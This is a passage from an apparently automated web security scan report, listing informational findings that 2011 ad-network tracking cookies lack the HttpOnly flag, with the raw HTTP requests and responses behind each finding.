=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$='i'y!$#X4!!!!#=#%VO!$#yu!!!!,='i'y!$$K<!!!!#=#$.g!$$rQ!!!!#='hvv!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!%='hvv!$(!P!!!!*='hvv!$(:q!!!!#=$Fss!$(Gt!!!!(='i'y!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!%='hvv!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$0V+!!!!$='i'y"; path=/; expires=Wed, 12-Jun-2013 11:17:29 GMT
Set-Cookie: BX=9knpau56vbsbg&b=4&s=7d&t=163; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=3i)1!_N/#uIZLs.; path=/; expires=Mon, 13-Jun-2011 12:21:10 GMT
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:17:29 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

13.50. http://ad.yieldmanager.com/unpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/unpixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!%/!!!?J!!!!)='htq!!(1-!!!!,='htq!!*10!!!!#='hvv!!*lZ!!!!#=$Wj6!!*oY!!!!%='hvv!!,WM!!!!#=$Wj6!!-?2!!!!*='hvv!!..X!!!!'=$L=p!!/GK!!!!,='htq!!/GR!!!!,='htq!!/Ju!!!!$='htq!!/K$!!!!'='htq!!/i,!!!!+='hvv!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!+='hvv!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!'='htq!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!-='htq!!J<K!!!!-='htq!!J<O!!!!+='htq!!J<S!!!!-='htq!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!+='hvv!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!%='hvv!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!*='hvv!!Zwb!!!!%='hvv!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!-='htq!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!%='hvv!!kl,!!!!%='hvv!!mL?!!!!#=%=pu!!mo!!!!!%='hvv!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!%='hvv!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!+='hvv!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#7(x!!!!#='hvv!#7)S!!!!#='hvv!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!+='htq!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!+='htq!#MTF!!!!'=%=]S!#MTH!!!!-='htq!#MTI!!!!-='htq!#MTJ!!!!-='htq!#Nyi!!!!#=!eq^!#O29!!!!)='hvv!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Os.!!!!#='hvv!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!+='hvv!#Sq>!!!!#='>m<!#T,d~~!#T^F!!!!#=!yv!!#TnE!!!!#='htq!#UDQ!!!!-='htq!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!%='hvv!#Z8E!!!!*='hvv!#Zgo!!!!#='hvv!#ZhT!!!!#='hvv!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!#='htq!#]Uq!!!!#='htq!#]Uy!!!!#='htq!#]Z!!!!!)='hvv!#]Z#!!!!%='hvv!#]w)!!!!+='htq!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!+='hvv!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!*='hvv!#`-Z!!!!%='htq!#`-[!!!!%='htq!#`cS!!!!#=%id8!#a=6!!!!%='hvv!#a=7!!!!%='hvv!#a=9!!!!%='hvv!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!)='hvv!#c8X!!!!)='hvv!#c8c!!!!)='hvv!#c8i!!!!)='hvv!#c8m!!!!)='hvv!#c8p!!!!)='hvv!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!*='hvv!#fBk!!!!*='hvv!#fBm!!!!*='hvv!#fBn!!!!*='hvv!#fFG!!!!#=#T_g!#fG)!!!!%='hvv!#fG+!!!!%='hvv!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!+='hvv!#g=r!!!!%='hvv!#gS,!!!!#='i$2!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!#='htq!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#t<c!!!!#='hvv!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uR1!!!!#='hvv!#uR3!!!!%='hvv!#uR7!!!!*='hvv!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!#='htq!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!#='htq!$#X4!!!!#=#%VO!$#yu!!!!+='htq!$$K<!!!!#=#$.g!$$rQ!!!!#='hvv!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!%='hvv!$(!P!!!!*='hvv!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!%='hvv!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$0V+!!!!#='htq"; path=/; expires=Wed, 12-Jun-2013 11:16:58 GMT
BX=9knpau56vbsbg&b=4&s=7d&t=163; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
lifb=3i)1!_N/#uIZLs.; path=/; expires=Mon, 13-Jun-2011 12:21:10 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /unpixel?id=961753&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!*!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$%ST~!%.B?!1UC$!%`n`!!!!$!?5%!$8o10!ZmB)!'mla!'me'~~~~~~=$G!==%EaVM.jTN!#+s2!,x.^!%)<k!0)2c!$tyl!6Z#3!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Jsh='HAD!!!([!#2Jp!,x.^!%)<k!2A@,!$u!!!7MU<!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Ju6='T?<!!!([!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!#Jl?!,x.^!%)<k!.#:A!%IaL!H<'$!?5%!(L(6:!w1K*!(#l)!#Ae[!%f(g~~~~~=$L#)=%JbC!!!([!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; bh="b!!!%)!!!?J!!!!(=$_d[!!(1-!!!!+=%=]S!!*lZ!!!!#=$Wj6!!*oY!!!!$=%@(m!!,WM!!!!#=$Wj6!!-?2!!!!)=%@(m!!-O3!!!!)=%@(m!!..X!!!!'=$L=p!!/GK!!!!+=%=]S!!/GR!!!!+=%=]S!!/Ju!!!!#=$_d[!!/K$!!!!%=%=]S!!/i,!!!!*=%@(m!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!*=%@(m!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!%=%=]S!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!,=%=]S!!J<K!!!!,=%=]S!!J<O!!!!*=%=]S!!J<S!!!!,=%=]S!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!*=%@(m!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!$=%@(m!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!)=%@(m!!Zwb!!!!$=%@(m!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!,=%=]S!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!$=%@(m!!kl,!!!!$=%@(m!!mL?!!!!#=%=pu!!mo!!!!!$=%@(m!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!$=%@(m!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!*=%@(m!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!*=%=]S!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!*=%=]S!#MTF!!!!'=%=]S!#MTH!!!!,=%=]S!#MTI!!!!,=%=]S!#MTJ!!!!,=%=]S!#Nyi!!!!#=!eq^!#O29!!!!(=%@(m!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!*=%@(m!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#UDQ!!!!,=%=]S!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!$=%@(m!#Z8E!!!!)=%@(m!#]%`!!!!#=#33)!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Z!!!!!(=%@(m!#]Z#!!!!$=%@(m!#]w)!!!!*=%=]S!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!*=%@(m!#^d6!!!!#=#33)!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!)=%@(m!#`-Z!!!!$=%=]S!#`-[!!!!$=%=]S!#`U0!!!!$=%@(m!#`cS!!!!#=%id8!#a=6!!!!$=%@(m!#a=7!!!!$=%@(m!#a=9!!!!$=%@(m!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#bj8!!!!#=#mS:!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!(=%@(m!#c8X!!!!(=%@(m!#c8c!!!!(=%@(m!#c8i!!!!(=%@(m!#c8m!!!!(=%@(m!#c8p!!!!(=%@(m!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!)=%@(m!#fBk!!!!)=%@(m!#fBm!!!!)=%@(m!#fBn!!!!)=%@(m!#fFG!!!!#=#T_g!#fG)!!!!$=%@(m!#fG+!!!!$=%@(m!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!*=%@(m!#g=r!!!!$=%@(m!#gsl!!!!#=#mS:!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#k]0!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!*=%=]S!#uR3!!!!$=%@(m!#uR7!!!!)=%@(m!#uRN!!!!#=#mS:!#uRP!!!!#=#mS:!#uY<!!!!#=!yv$!#v,U!!!!#=#mS:!#v,Y!!!!#=#mS:!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#9a!!!!#=%j],!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#X4!!!!#=#%VO!$#yu!!!!*=%=]S!$$K<!!!!#=#$.g!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!$=%@(m!$(!P!!!!)=%@(m!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!$=%@(m!$+Dr!!!!#=#mS:!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-,y!!!!#=#mS:!$-kY!!!!#=#mS:!$-kv!!!!#=#mS:!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5"; ih="b!!!!E!'4@g!!!!#=$KA3!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.`.U!!!!#='htS!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2"; vuday1=Gf(n`NBHr8*mOw]; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:16:58 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%/!!!?J!!!!)='htq!!(1-!!!!,='htq!!*10!!!!#='hvv!!*lZ!!!!#=$Wj6!!*oY!!!!%='hvv!!,WM!!!!#=$Wj6!!-?2!!!!*='hvv!!..X!!!!'=$L=p!!/GK!!!!,='htq!!/GR!!!!,='htq!!/Ju!!!!$='htq!!/K$!!!!'='htq!!/i,!!!!+='hvv!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!+='hvv!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!'='htq!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!-='htq!!J<K!!!!-='htq!!J<O!!!!+='htq!!J<S!!!!-='htq!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!+='hvv!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!%='hvv!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!*='hvv!!Zwb!!!!%='hvv!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!-='htq!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!%='hvv!!kl,!!!!%='hvv!!mL?!!!!#=%=pu!!mo!!!!!%='hvv!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!%='hvv!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!+='hvv!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#7(x!!!!#='hvv!#7)S!!!!#='hvv!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!+='htq!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!+='htq!#MTF!!!!'=%=]S!#MTH!!!!-='htq!#MTI!!!!-='htq!#MTJ!!!!-='htq!#Nyi!!!!#=!eq^!#O29!!!!)='hvv!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Os.!!!!#='hvv!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!+='hvv!#Sq>!!!!#='>m<!#T,d~~!#T^F!!!!#=!yv!!#TnE!!!!#='htq!#UDQ!!!!-='htq!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!%='hvv!#Z8E!!!!*='hvv!#Zgo!!!!#='hvv!#ZhT!!!!#='hvv!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!#='htq!#]Uq!!!!#='htq!#]Uy!!!!#='htq!#]Z!!!!!)='hvv!#]Z#!!!!%='hvv!#]w)!!!!+='htq!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!+='hvv!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!*='hvv!#`-Z!!!!%='htq!#`-[!!!!%='htq!#`cS!!!!#=%id8!#a=6!!!!%='hvv!#a=7!!!!%='hvv!#a=9!!!!%='hvv!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!)='hvv!#c8X!!!!)='hvv!#c8c!!!!)='hvv!#c8i!!!!)='hvv!#c8m!!!!)='hvv!#c8p!!!!)='hvv!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!*='hvv!#fBk!!!!*='hvv!#fBm!!!!*='hvv!#fBn!!!!*='hvv!#fFG!!!!#=#T_g!#fG)!!!!%='hvv!#fG+!!!!%='hvv!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!+='hvv!#g=r!!!!%='hvv!#gS,!!!!#='i$2!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!#='htq!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#t<c!!!!#='hvv!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uR1!!!!#='hvv!#uR3!!!!%='hvv!#uR7!!!!*='hvv!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!#='htq!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!#='htq!$#X4!!!!#=#%VO!$#yu!!!!+='htq!$$K<!!!!#=#$.g!$$rQ!!!!#='hvv!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!%='hvv!$(!P!!!!*='hvv!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!%='hvv!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$0V+!!!!#='htq"; path=/; expires=Wed, 12-Jun-2013 11:16:58 GMT
Set-Cookie: BX=9knpau56vbsbg&b=4&s=7d&t=163; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=3i)1!_N/#uIZLs.; path=/; expires=Mon, 13-Jun-2011 12:21:10 GMT
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:16:58 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

13.51. http://admeld.lucidmedia.com/clicksense/admeld/match previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.lucidmedia.com
Path:	/clicksense/admeld/match

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

2=304YId6UCEb; Domain=.lucidmedia.com; Expires=Tue, 12-Jun-2012 11:21:16 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

